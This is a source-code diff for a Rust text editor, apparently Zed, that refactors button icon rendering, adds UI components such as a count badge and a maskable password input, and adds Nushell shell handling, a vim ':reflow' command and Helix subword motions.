-use gpui::Hsla;
-
-/// An icon that appears within a button.
-///
-/// Can be used as either an icon alongside a label, like in [`Button`](crate::Button),
-/// or as a standalone icon, like in [`IconButton`](crate::IconButton).
-#[derive(IntoElement, RegisterComponent)]
-pub(super) struct ButtonIcon {
- icon: IconName,
- size: IconSize,
- color: Color,
- disabled: bool,
- selected: bool,
- selected_icon: Option<IconName>,
- selected_icon_color: Option<Color>,
- selected_style: Option<ButtonStyle>,
- indicator: Option<Indicator>,
- indicator_border_color: Option<Hsla>,
-}
-
-impl ButtonIcon {
- pub fn new(icon: IconName) -> Self {
- Self {
- icon,
- size: IconSize::default(),
- color: Color::default(),
- disabled: false,
- selected: false,
- selected_icon: None,
- selected_icon_color: None,
- selected_style: None,
- indicator: None,
- indicator_border_color: None,
- }
- }
-
- pub fn size(mut self, size: impl Into<Option<IconSize>>) -> Self {
- if let Some(size) = size.into() {
- self.size = size;
- }
- self
- }
-
- pub fn color(mut self, color: impl Into<Option<Color>>) -> Self {
- if let Some(color) = color.into() {
- self.color = color;
- }
- self
- }
-
- pub fn selected_icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.selected_icon = icon.into();
- self
- }
-
- pub fn selected_icon_color(mut self, color: impl Into<Option<Color>>) -> Self {
- self.selected_icon_color = color.into();
- self
- }
-
- pub fn indicator(mut self, indicator: Indicator) -> Self {
- self.indicator = Some(indicator);
- self
- }
-
- pub fn indicator_border_color(mut self, color: Option<Hsla>) -> Self {
- self.indicator_border_color = color;
- self
- }
-}
-
-impl Disableable for ButtonIcon {
- fn disabled(mut self, disabled: bool) -> Self {
- self.disabled = disabled;
- self
- }
-}
-
-impl Toggleable for ButtonIcon {
- fn toggle_state(mut self, selected: bool) -> Self {
- self.selected = selected;
- self
- }
-}
-
-impl SelectableButton for ButtonIcon {
- fn selected_style(mut self, style: ButtonStyle) -> Self {
- self.selected_style = Some(style);
- self
- }
-}
-
-impl RenderOnce for ButtonIcon {
- fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
- let icon = self
- .selected_icon
- .filter(|_| self.selected)
- .unwrap_or(self.icon);
-
- let icon_color = if self.disabled {
- Color::Disabled
- } else if self.selected_style.is_some() && self.selected {
- self.selected_style.unwrap().into()
- } else if self.selected {
- self.selected_icon_color.unwrap_or(Color::Selected)
- } else {
- self.color
- };
-
- let icon = Icon::new(icon).size(self.size).color(icon_color);
-
- match self.indicator {
- Some(indicator) => IconWithIndicator::new(icon, Some(indicator))
- .indicator_border_color(self.indicator_border_color)
- .into_any_element(),
- None => icon.into_any_element(),
- }
- }
-}
-
-impl Component for ButtonIcon {
- fn scope() -> ComponentScope {
- ComponentScope::Input
- }
-
- fn name() -> &'static str {
- "ButtonIcon"
- }
-
- fn description() -> Option<&'static str> {
- Some("An icon component specifically designed for use within buttons.")
- }
-
- fn preview(_window: &mut Window, _cx: &mut App) -> Option<AnyElement> {
- Some(
- v_flex()
- .gap_6()
- .children(vec![
- example_group_with_title(
- "Basic Usage",
- vec![
- single_example(
- "Default",
- ButtonIcon::new(IconName::Star).into_any_element(),
- ),
- single_example(
- "Custom Size",
- ButtonIcon::new(IconName::Star)
- .size(IconSize::Medium)
- .into_any_element(),
- ),
- single_example(
- "Custom Color",
- ButtonIcon::new(IconName::Star)
- .color(Color::Accent)
- .into_any_element(),
- ),
- ],
- ),
- example_group_with_title(
- "States",
- vec![
- single_example(
- "Selected",
- ButtonIcon::new(IconName::Star)
- .toggle_state(true)
- .into_any_element(),
- ),
- single_example(
- "Disabled",
- ButtonIcon::new(IconName::Star)
- .disabled(true)
- .into_any_element(),
- ),
- ],
- ),
- example_group_with_title(
- "With Indicator",
- vec![
- single_example(
- "Default Indicator",
- ButtonIcon::new(IconName::Star)
- .indicator(Indicator::dot())
- .into_any_element(),
- ),
- single_example(
- "Custom Indicator",
- ButtonIcon::new(IconName::Star)
- .indicator(Indicator::dot().color(Color::Error))
- .into_any_element(),
- ),
- ],
- ),
- ])
- .into_any_element(),
- )
- }
-}
@@ -1,11 +1,11 @@
use gpui::{AnyView, DefiniteLength, Hsla};
use super::button_like::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle};
-use crate::{ElevationIndex, Indicator, SelectableButton, TintColor, prelude::*};
+use crate::{
+ ElevationIndex, Icon, IconWithIndicator, Indicator, SelectableButton, TintColor, prelude::*,
+};
use crate::{IconName, IconSize};
-use super::button_icon::ButtonIcon;
-
/// The shape of an [`IconButton`].
#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)]
pub enum IconButtonShape {
@@ -22,6 +22,7 @@ pub struct IconButton {
icon_color: Color,
selected_icon: Option<IconName>,
selected_icon_color: Option<Color>,
+ selected_style: Option<ButtonStyle>,
indicator: Option<Indicator>,
indicator_border_color: Option<Hsla>,
alpha: Option<f32>,
@@ -37,6 +38,7 @@ impl IconButton {
icon_color: Color::Default,
selected_icon: None,
selected_icon_color: None,
+ selected_style: None,
indicator: None,
indicator_border_color: None,
alpha: None,
@@ -112,6 +114,7 @@ impl Toggleable for IconButton {
impl SelectableButton for IconButton {
fn selected_style(mut self, style: ButtonStyle) -> Self {
+ self.selected_style = Some(style);
self.base = self.base.selected_style(style);
self
}
@@ -192,9 +195,25 @@ impl RenderOnce for IconButton {
fn render(self, window: &mut Window, cx: &mut App) -> ButtonLike {
let is_disabled = self.base.disabled;
let is_selected = self.base.selected;
- let selected_style = self.base.selected_style;
- let color = self.icon_color.color(cx).opacity(self.alpha.unwrap_or(1.0));
+ let icon = self
+ .selected_icon
+ .filter(|_| is_selected)
+ .unwrap_or(self.icon);
+
+ let icon_color = if is_disabled {
+ Color::Disabled
+ } else if self.selected_style.is_some() && is_selected {
+ self.selected_style.unwrap().into()
+ } else if is_selected {
+ self.selected_icon_color.unwrap_or(Color::Selected)
+ } else {
+ let base_color = self.icon_color.color(cx);
+ Color::Custom(base_color.opacity(self.alpha.unwrap_or(1.0)))
+ };
+
+ let icon_element = Icon::new(icon).size(self.icon_size).color(icon_color);
+
self.base
.map(|this| match self.shape {
IconButtonShape::Square => {
@@ -203,20 +222,12 @@ impl RenderOnce for IconButton {
}
IconButtonShape::Wide => this,
})
- .child(
- ButtonIcon::new(self.icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .when_some(selected_style, |this, style| this.selected_style(style))
- .when_some(self.indicator, |this, indicator| {
- this.indicator(indicator)
- .indicator_border_color(self.indicator_border_color)
- })
- .size(self.icon_size)
- .color(Color::Custom(color)),
- )
+ .child(match self.indicator {
+ Some(indicator) => IconWithIndicator::new(icon_element, Some(indicator))
+ .indicator_border_color(self.indicator_border_color)
+ .into_any_element(),
+ None => icon_element.into_any_element(),
+ })
}
}
@@ -81,8 +81,7 @@ impl RenderOnce for Chip {
h_flex()
.when_some(self.height, |this, h| this.h(h))
- .min_w_0()
- .flex_initial()
+ .flex_none()
.px_1()
.border_1()
.rounded_sm()
@@ -692,10 +692,20 @@ impl ContextMenu {
}
pub fn action_checked(
+ self,
+ label: impl Into<SharedString>,
+ action: Box<dyn Action>,
+ checked: bool,
+ ) -> Self {
+ self.action_checked_with_disabled(label, action, checked, false)
+ }
+
+ pub fn action_checked_with_disabled(
mut self,
label: impl Into<SharedString>,
action: Box<dyn Action>,
checked: bool,
+ disabled: bool,
) -> Self {
self.items.push(ContextMenuItem::Entry(ContextMenuEntry {
toggle: if checked {
@@ -718,7 +728,7 @@ impl ContextMenu {
icon_position: IconPosition::End,
icon_size: IconSize::Small,
icon_color: None,
- disabled: false,
+ disabled,
documentation_aside: None,
end_slot_icon: None,
end_slot_title: None,
@@ -0,0 +1,93 @@
+use gpui::FontWeight;
+
+use crate::prelude::*;
+
+/// A small, pill-shaped badge that displays a numeric count.
+///
+/// The count is capped at 99 and displayed as "99+" beyond that.
+#[derive(IntoElement, RegisterComponent)]
+pub struct CountBadge {
+ count: usize,
+}
+
+impl CountBadge {
+ pub fn new(count: usize) -> Self {
+ Self { count }
+ }
+}
+
+impl RenderOnce for CountBadge {
+ fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
+ let label = if self.count > 99 {
+ "99+".to_string()
+ } else {
+ self.count.to_string()
+ };
+
+ let bg = cx
+ .theme()
+ .colors()
+ .editor_background
+ .blend(cx.theme().status().error.opacity(0.4));
+
+ h_flex()
+ .absolute()
+ .top_0()
+ .right_0()
+ .p_px()
+ .h_3p5()
+ .min_w_3p5()
+ .rounded_full()
+ .justify_center()
+ .text_center()
+ .border_1()
+ .border_color(cx.theme().colors().border)
+ .bg(bg)
+ .shadow_sm()
+ .child(
+ Label::new(label)
+ .size(LabelSize::Custom(rems_from_px(9.)))
+ .weight(FontWeight::MEDIUM),
+ )
+ }
+}
+
+impl Component for CountBadge {
+ fn scope() -> ComponentScope {
+ ComponentScope::Status
+ }
+
+ fn description() -> Option<&'static str> {
+ Some("A small, pill-shaped badge that displays a numeric count.")
+ }
+
+ fn preview(_window: &mut Window, cx: &mut App) -> Option<AnyElement> {
+ let container = || {
+ div()
+ .relative()
+ .size_8()
+ .border_1()
+ .border_color(cx.theme().colors().border)
+ .bg(cx.theme().colors().background)
+ };
+
+ Some(
+ v_flex()
+ .gap_6()
+ .child(example_group_with_title(
+ "Count Badge",
+ vec![
+ single_example(
+ "Basic Count",
+ container().child(CountBadge::new(3)).into_any_element(),
+ ),
+ single_example(
+ "Capped Count",
+ container().child(CountBadge::new(150)).into_any_element(),
+ ),
+ ],
+ ))
+ .into_any_element(),
+ )
+ }
+}
@@ -1,3 +1,4 @@
+use crate::Tooltip;
use crate::prelude::*;
#[derive(IntoElement, RegisterComponent)]
@@ -6,6 +7,7 @@ pub struct DiffStat {
added: usize,
removed: usize,
label_size: LabelSize,
+ tooltip: Option<SharedString>,
}
impl DiffStat {
@@ -15,6 +17,7 @@ impl DiffStat {
added,
removed,
label_size: LabelSize::Small,
+ tooltip: None,
}
}
@@ -22,41 +25,32 @@ impl DiffStat {
self.label_size = label_size;
self
}
+
+ pub fn tooltip(mut self, tooltip: impl Into<SharedString>) -> Self {
+ self.tooltip = Some(tooltip.into());
+ self
+ }
}
impl RenderOnce for DiffStat {
fn render(self, _: &mut Window, _cx: &mut App) -> impl IntoElement {
+ let tooltip = self.tooltip;
h_flex()
.id(self.id)
.gap_1()
.child(
- h_flex()
- .gap_0p5()
- .child(
- Icon::new(IconName::Plus)
- .size(IconSize::XSmall)
- .color(Color::Success),
- )
- .child(
- Label::new(self.added.to_string())
- .color(Color::Success)
- .size(self.label_size),
- ),
+ Label::new(format!("+\u{2009}{}", self.added))
+ .color(Color::Success)
+ .size(self.label_size),
)
.child(
- h_flex()
- .gap_0p5()
- .child(
- Icon::new(IconName::Dash)
- .size(IconSize::XSmall)
- .color(Color::Error),
- )
- .child(
- Label::new(self.removed.to_string())
- .color(Color::Error)
- .size(self.label_size),
- ),
+ Label::new(format!("\u{2012}\u{2009}{}", self.removed))
+ .color(Color::Error)
+ .size(self.label_size),
)
+ .when_some(tooltip, |this, tooltip| {
+ this.tooltip(Tooltip::text(tooltip))
+ })
}
}
@@ -163,11 +163,10 @@ impl RenderOnce for DropdownMenu {
Some(
Button::new(self.id.clone(), text)
.style(button_style)
- .when(self.chevron, |this| {
- this.icon(self.trigger_icon)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .when_some(self.trigger_icon.filter(|_| self.chevron), |this, icon| {
+ this.end_icon(
+ Icon::new(icon).size(IconSize::XSmall).color(Color::Muted),
+ )
})
.when(full_width, |this| this.full_width())
.size(trigger_size)
@@ -1,6 +1,6 @@
use std::ops::Range;
-use gpui::{FontWeight, HighlightStyle, StyledText};
+use gpui::{FontWeight, HighlightStyle, StyleRefinement, StyledText};
use crate::{LabelCommon, LabelLike, LabelSize, LineHeightStyle, prelude::*};
@@ -38,6 +38,40 @@ impl HighlightedLabel {
}
}
+impl HighlightedLabel {
+ fn style(&mut self) -> &mut StyleRefinement {
+ self.base.base.style()
+ }
+
+ pub fn flex_1(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self.style().flex_shrink = Some(1.);
+ self.style().flex_basis = Some(gpui::relative(0.).into());
+ self
+ }
+
+ pub fn flex_none(mut self) -> Self {
+ self.style().flex_grow = Some(0.);
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+
+ pub fn flex_grow(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink(mut self) -> Self {
+ self.style().flex_shrink = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink_0(mut self) -> Self {
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+}
+
impl LabelCommon for HighlightedLabel {
fn size(mut self, size: LabelSize) -> Self {
self.base = self.base.size(size);
@@ -73,6 +73,34 @@ impl Label {
gpui::margin_style_methods!({
visibility: pub
});
+
+ pub fn flex_1(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self.style().flex_shrink = Some(1.);
+ self.style().flex_basis = Some(gpui::relative(0.).into());
+ self
+ }
+
+ pub fn flex_none(mut self) -> Self {
+ self.style().flex_grow = Some(0.);
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+
+ pub fn flex_grow(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink(mut self) -> Self {
+ self.style().flex_shrink = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink_0(mut self) -> Self {
+ self.style().flex_shrink = Some(0.);
+ self
+ }
}
impl LabelCommon for Label {
@@ -4,7 +4,7 @@ use component::{Component, ComponentScope, example_group_with_title, single_exam
use gpui::{AnyElement, AnyView, ClickEvent, MouseButton, MouseDownEvent, Pixels, px};
use smallvec::SmallVec;
-use crate::{Disclosure, GradientFade, prelude::*};
+use crate::{Disclosure, prelude::*};
#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy, Default)]
pub enum ListItemSpacing {
@@ -45,6 +45,8 @@ pub struct ListItem {
rounded: bool,
overflow_x: bool,
focused: Option<bool>,
+ docked_right: bool,
+ height: Option<Pixels>,
}
impl ListItem {
@@ -74,6 +76,8 @@ impl ListItem {
rounded: false,
overflow_x: false,
focused: None,
+ docked_right: false,
+ height: None,
}
}
@@ -185,6 +189,16 @@ impl ListItem {
self.focused = Some(focused);
self
}
+
+ pub fn docked_right(mut self, docked_right: bool) -> Self {
+ self.docked_right = docked_right;
+ self
+ }
+
+ pub fn height(mut self, height: Pixels) -> Self {
+ self.height = Some(height);
+ self
+ }
}
impl Disableable for ListItem {
@@ -209,25 +223,11 @@ impl ParentElement for ListItem {
impl RenderOnce for ListItem {
fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
- let color = cx.theme().colors();
-
- let base_bg = if self.selected {
- color.element_active
- } else {
- color.panel_background
- };
-
- let end_hover_gradient_overlay =
- GradientFade::new(base_bg, color.element_hover, color.element_active)
- .width(px(96.0))
- .when_some(self.group_name.clone(), |fade, group| {
- fade.group_name(group)
- });
-
h_flex()
.id(self.id)
.when_some(self.group_name, |this, group| this.group(group))
.w_full()
+ .when_some(self.height, |this, height| this.h(height))
.relative()
// When an item is inset draw the indent spacing outside of the item
.when(self.inset, |this| {
@@ -238,6 +238,7 @@ impl RenderOnce for ListItem {
this.when_some(self.focused, |this, focused| {
if focused {
this.border_1()
+ .when(self.docked_right, |this| this.border_r_2())
.border_color(cx.theme().colors().border_focused)
} else {
this.border_1()
@@ -268,26 +269,21 @@ impl RenderOnce for ListItem {
ListItemSpacing::Sparse => this.py_1(),
})
.when(self.inset && !self.disabled, |this| {
- this
- // TODO: Add focus state
- //.when(self.state == InteractionState::Focused, |this| {
- .when_some(self.focused, |this, focused| {
- if focused {
- this.border_1()
- .border_color(cx.theme().colors().border_focused)
- } else {
- this.border_1()
- }
- })
- .when(self.selectable, |this| {
- this.hover(|style| {
- style.bg(cx.theme().colors().ghost_element_hover)
- })
+ this.when_some(self.focused, |this, focused| {
+ if focused {
+ this.border_1()
+ .border_color(cx.theme().colors().border_focused)
+ } else {
+ this.border_1()
+ }
+ })
+ .when(self.selectable, |this| {
+ this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover))
.active(|style| style.bg(cx.theme().colors().ghost_element_active))
.when(self.selected, |this| {
this.bg(cx.theme().colors().ghost_element_selected)
})
- })
+ })
})
.when_some(
self.on_click.filter(|_| !self.disabled),
@@ -362,7 +358,6 @@ impl RenderOnce for ListItem {
.right(DynamicSpacing::Base06.rems(cx))
.top_0()
.visible_on_hover("list_item")
- .child(end_hover_gradient_overlay)
.child(end_hover_slot),
)
}),
@@ -162,7 +162,7 @@ impl RenderOnce for ModalHeader {
children.insert(
0,
Headline::new(headline)
- .size(HeadlineSize::XSmall)
+ .size(HeadlineSize::Small)
.color(Color::Muted)
.into_any_element(),
);
@@ -23,3 +23,14 @@ pub use with_rem_size::*;
pub fn is_light(cx: &mut App) -> bool {
cx.theme().appearance.is_light()
}
+
+/// Returns the platform-appropriate label for the "reveal in file manager" action.
+pub fn reveal_in_file_manager_label(is_remote: bool) -> &'static str {
+ if cfg!(target_os = "macos") && !is_remote {
+ "Reveal in Finder"
+ } else if cfg!(target_os = "windows") && !is_remote {
+ "Reveal in File Explorer"
+ } else {
+ "Reveal in File Manager"
+ }
+}
@@ -3,6 +3,7 @@ use component::{example_group, single_example};
use gpui::{App, FocusHandle, Focusable, Hsla, Length};
use std::sync::Arc;
+use ui::Tooltip;
use ui::prelude::*;
use crate::ErasedEditor;
@@ -38,6 +39,8 @@ pub struct InputField {
tab_index: Option<isize>,
/// Whether this field is a tab stop (can be focused via Tab key).
tab_stop: bool,
+ /// Whether the field content is masked (for sensitive fields like passwords or API keys).
+ masked: Option<bool>,
}
impl Focusable for InputField {
@@ -63,6 +66,7 @@ impl InputField {
min_width: px(192.).into(),
tab_index: None,
tab_stop: true,
+ masked: None,
}
}
@@ -96,6 +100,12 @@ impl InputField {
self
}
+ /// Sets this field as a masked/sensitive input (e.g., for passwords or API keys).
+ pub fn masked(mut self, masked: bool) -> Self {
+ self.masked = Some(masked);
+ self
+ }
+
pub fn is_empty(&self, cx: &App) -> bool {
self.editor().text(cx).trim().is_empty()
}
@@ -115,12 +125,20 @@ impl InputField {
pub fn set_text(&self, text: &str, window: &mut Window, cx: &mut App) {
self.editor().set_text(text, window, cx)
}
+
+ pub fn set_masked(&self, masked: bool, window: &mut Window, cx: &mut App) {
+ self.editor().set_masked(masked, window, cx)
+ }
}
impl Render for InputField {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let editor = self.editor.clone();
+ if let Some(masked) = self.masked {
+ self.editor.set_masked(masked, window, cx);
+ }
+
let theme_color = cx.theme().colors();
let style = InputFieldStyle {
@@ -172,7 +190,31 @@ impl Render for InputField {
this.gap_1()
.child(Icon::new(icon).size(IconSize::Small).color(Color::Muted))
})
- .child(self.editor.render(window, cx)),
+ .child(self.editor.render(window, cx))
+ .when_some(self.masked, |this, is_masked| {
+ this.child(
+ IconButton::new(
+ "toggle-masked",
+ if is_masked {
+ IconName::Eye
+ } else {
+ IconName::EyeOff
+ },
+ )
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted)
+ .tooltip(Tooltip::text(if is_masked { "Show" } else { "Hide" }))
+ .on_click(cx.listener(
+ |this, _, window, cx| {
+ if let Some(ref mut masked) = this.masked {
+ *masked = !*masked;
+ this.editor.set_masked(*masked, window, cx);
+ cx.notify();
+ }
+ },
+ )),
+ )
+ }),
)
}
}
@@ -21,7 +21,7 @@ test-support = ["git2", "rand", "util_macros"]
anyhow.workspace = true
async_zip.workspace = true
collections.workspace = true
-dunce = "1.0"
+dunce.workspace = true
futures-lite.workspace = true
futures.workspace = true
globset.workspace = true
@@ -5,7 +5,7 @@ use std::{
use crate::paths::SanitizedPath;
use itertools::Itertools;
-use serde::{Deserialize, Deserializer, Serialize, Serializer};
+use serde::{Deserialize, Serialize};
/// A list of absolute paths, in a specific order.
///
@@ -23,7 +23,7 @@ pub struct PathList {
order: Arc<[usize]>,
}
-#[derive(Debug)]
+#[derive(Debug, Serialize, Deserialize)]
pub struct SerializedPathList {
pub paths: String,
pub order: String,
@@ -119,19 +119,6 @@ impl PathList {
}
}
-impl Serialize for PathList {
- fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> {
- self.paths.serialize(serializer)
- }
-}
-
-impl<'de> Deserialize<'de> for PathList {
- fn deserialize<D: Deserializer<'de>>(deserializer: D) -> Result<Self, D::Error> {
- let paths: Vec<PathBuf> = Vec::deserialize(deserializer)?;
- Ok(PathList::new(&paths))
- }
-}
-
#[cfg(test)]
mod tests {
use super::*;
@@ -73,13 +73,27 @@ async fn capture_unix(
command.arg("-l");
}
}
+
+ match shell_kind {
+ // Nushell does not allow non-interactive login shells.
+ // Instead of "-l -i -c '<command>'",
+ // use "-l -e '<command>; exit'".
+ ShellKind::Nushell => command.arg("-e"),
+ _ => command.args(["-i", "-c"]),
+ };
+
// cd into the directory, triggering directory specific side-effects (asdf, direnv, etc)
command_string.push_str(&format!("cd '{}';", directory.display()));
if let Some(prefix) = shell_kind.command_prefix() {
command_string.push(prefix);
}
command_string.push_str(&format!("{} --printenv {}", zed_path, redir));
- command.args(["-i", "-c", &command_string]);
+
+ if let ShellKind::Nushell = shell_kind {
+ command_string.push_str("; exit");
+ }
+
+ command.arg(&command_string);
super::set_pre_exec_to_start_new_session(&mut command);
@@ -28,7 +28,7 @@ use std::{
sync::OnceLock,
time::Instant,
};
-use task::{HideStrategy, RevealStrategy, SpawnInTerminal, TaskId};
+use task::{HideStrategy, RevealStrategy, SaveStrategy, SpawnInTerminal, TaskId};
use ui::ActiveTheme;
use util::{
ResultExt,
@@ -47,6 +47,7 @@ use crate::{
search::{FindCommand, ReplaceCommand, Replacement},
},
object::Object,
+ rewrap::Rewrap,
state::{Mark, Mode},
visual::VisualDeleteLine,
};
@@ -1725,6 +1726,15 @@ fn generate_commands(_: &App) -> Vec<VimCommand> {
)
.range(wrap_count),
VimCommand::new(("j", "oin"), JoinLines).range(select_range),
+ VimCommand::new(("reflow", ""), Rewrap { line_length: None })
+ .range(select_range)
+ .args(|_action, args| {
+ args.parse::<usize>().map_or(None, |length| {
+ Some(Box::new(Rewrap {
+ line_length: Some(length),
+ }))
+ })
+ }),
VimCommand::new(("fo", "ld"), editor::actions::FoldSelectedRanges).range(act_on_range),
VimCommand::new(("foldo", "pen"), editor::actions::UnfoldLines)
.bang(editor::actions::UnfoldRecursive)
@@ -2479,6 +2489,7 @@ impl ShellExec {
show_summary: false,
show_command: false,
show_rerun: false,
+ save: SaveStrategy::default(),
};
let task_status = workspace.spawn_in_terminal(spawn_in_terminal, window, cx);
@@ -3536,4 +3547,88 @@ mod test {
Mode::Normal,
);
}
+
+ #[gpui::test]
+ async fn test_reflow(cx: &mut TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+
+ cx.update_editor(|editor, _window, cx| {
+ editor.set_hard_wrap(Some(10), cx);
+ });
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123456789 0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.simulate_keystrokes(": reflow");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ 0123456789
+ ˇ0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123456789 0123456789
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes("shift-v : reflow");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ 0123456789
+ ˇ0123456789
+ "},
+ Mode::Normal,
+ );
+
+ cx.set_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes(": reflow space 7");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ ˇ0123
+ 4567
+ 0123
+ 4567
+ "},
+ Mode::Normal,
+ );
+
+ // Assert that, if `:reflow` is invoked with an invalid argument, it
+ // does not actually have any effect on the buffer's contents.
+ cx.set_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+
+ cx.simulate_keystrokes(": reflow space a");
+ cx.simulate_keystrokes("enter");
+
+ cx.assert_state(
+ indoc! {"
+ ˇ0123 4567 0123 4567
+ "},
+ Mode::VisualLine,
+ );
+ }
}
@@ -12,6 +12,7 @@ use editor::{
};
use gpui::actions;
use gpui::{Context, Window};
+use itertools::Itertools as _;
use language::{CharClassifier, CharKind, Point};
use search::{BufferSearchBar, SearchOptions};
use settings::Settings;
@@ -36,6 +37,8 @@ actions!(
HelixInsert,
/// Appends at the end of the selection.
HelixAppend,
+ /// Inserts at the end of the current Helix cursor line.
+ HelixInsertEndOfLine,
/// Goes to the location of the last modification.
HelixGotoLastModification,
/// Select entire line or multiple lines, extending downwards.
@@ -64,6 +67,7 @@ pub fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
Vim::action(editor, cx, Vim::helix_select_lines);
Vim::action(editor, cx, Vim::helix_insert);
Vim::action(editor, cx, Vim::helix_append);
+ Vim::action(editor, cx, Vim::helix_insert_end_of_line);
Vim::action(editor, cx, Vim::helix_yank);
Vim::action(editor, cx, Vim::helix_goto_last_modification);
Vim::action(editor, cx, Vim::helix_paste);
@@ -363,6 +367,56 @@ impl Vim {
}
}
+ /// When `reversed` is true (used with `helix_find_range_backward`), the
+ /// `left` and `right` characters are yielded in reverse text order, so the
+ /// camelCase transition check must be flipped accordingly.
+ fn subword_boundary_start(
+ ignore_punctuation: bool,
+ reversed: bool,
+ ) -> impl FnMut(char, char, &CharClassifier) -> bool {
+ move |left, right, classifier| {
+ let left_kind = classifier.kind_with(left, ignore_punctuation);
+ let right_kind = classifier.kind_with(right, ignore_punctuation);
+ let at_newline = (left == '\n') ^ (right == '\n');
+ let is_separator = |c: char| "_$=".contains(c);
+
+ let is_word = left_kind != right_kind && right_kind != CharKind::Whitespace;
+ let is_subword = (is_separator(left) && !is_separator(right))
+ || if reversed {
+ right.is_lowercase() && left.is_uppercase()
+ } else {
+ left.is_lowercase() && right.is_uppercase()
+ };
+
+ is_word || (is_subword && !right.is_whitespace()) || at_newline
+ }
+ }
+
+ /// When `reversed` is true (used with `helix_find_range_backward`), the
+ /// `left` and `right` characters are yielded in reverse text order, so the
+ /// camelCase transition check must be flipped accordingly.
+ fn subword_boundary_end(
+ ignore_punctuation: bool,
+ reversed: bool,
+ ) -> impl FnMut(char, char, &CharClassifier) -> bool {
+ move |left, right, classifier| {
+ let left_kind = classifier.kind_with(left, ignore_punctuation);
+ let right_kind = classifier.kind_with(right, ignore_punctuation);
+ let at_newline = (left == '\n') ^ (right == '\n');
+ let is_separator = |c: char| "_$=".contains(c);
+
+ let is_word = left_kind != right_kind && left_kind != CharKind::Whitespace;
+ let is_subword = (!is_separator(left) && is_separator(right))
+ || if reversed {
+ right.is_lowercase() && left.is_uppercase()
+ } else {
+ left.is_lowercase() && right.is_uppercase()
+ };
+
+ is_word || (is_subword && !left.is_whitespace()) || at_newline
+ }
+ }
+
pub fn helix_move_cursor(
&mut self,
motion: Motion,
@@ -387,6 +441,29 @@ impl Vim {
let mut is_boundary = Self::is_boundary_right(ignore_punctuation);
self.helix_find_range_backward(times, window, cx, &mut is_boundary)
}
+ // The subword motions implementation is based on the same
+ // commands present in Helix itself, namely:
+ //
+ // * `move_next_sub_word_start`
+ // * `move_next_sub_word_end`
+ // * `move_prev_sub_word_start`
+ // * `move_prev_sub_word_end`
+ Motion::NextSubwordStart { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, false);
+ self.helix_find_range_forward(times, window, cx, &mut is_boundary)
+ }
+ Motion::NextSubwordEnd { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, false);
+ self.helix_find_range_forward(times, window, cx, &mut is_boundary)
+ }
+ Motion::PreviousSubwordStart { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, true);
+ self.helix_find_range_backward(times, window, cx, &mut is_boundary)
+ }
+ Motion::PreviousSubwordEnd { ignore_punctuation } => {
+ let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, true);
+ self.helix_find_range_backward(times, window, cx, &mut is_boundary)
+ }
Motion::EndOfLine { .. } => {
// In Helix mode, EndOfLine should position cursor ON the last character,
// not after it. We therefore need special handling for it.
@@ -600,6 +677,34 @@ impl Vim {
});
}
+ /// Helix-specific implementation of `shift-a` that accounts for Helix's
+ /// selection model, where selecting a line with `x` creates a selection
+ /// from column 0 of the current row to column 0 of the next row, so the
+ /// default [`vim::normal::InsertEndOfLine`] would move the cursor to the
+ /// end of the wrong line.
+ fn helix_insert_end_of_line(
+ &mut self,
+ _: &HelixInsertEndOfLine,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.start_recording(cx);
+ self.switch_mode(Mode::Insert, false, window, cx);
+ self.update_editor(cx, |_, editor, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.move_with(&mut |map, selection| {
+ let cursor = if !selection.is_empty() && !selection.reversed {
+ movement::left(map, selection.head())
+ } else {
+ selection.head()
+ };
+ selection
+ .collapse_to(motion::next_line_end(map, cursor, 1), SelectionGoal::None);
+ });
+ });
+ });
+ }
+
pub fn helix_replace(&mut self, text: &str, window: &mut Window, cx: &mut Context<Self>) {
self.update_editor(cx, |_, editor, cx| {
editor.transact(window, cx, |editor, window, cx| {
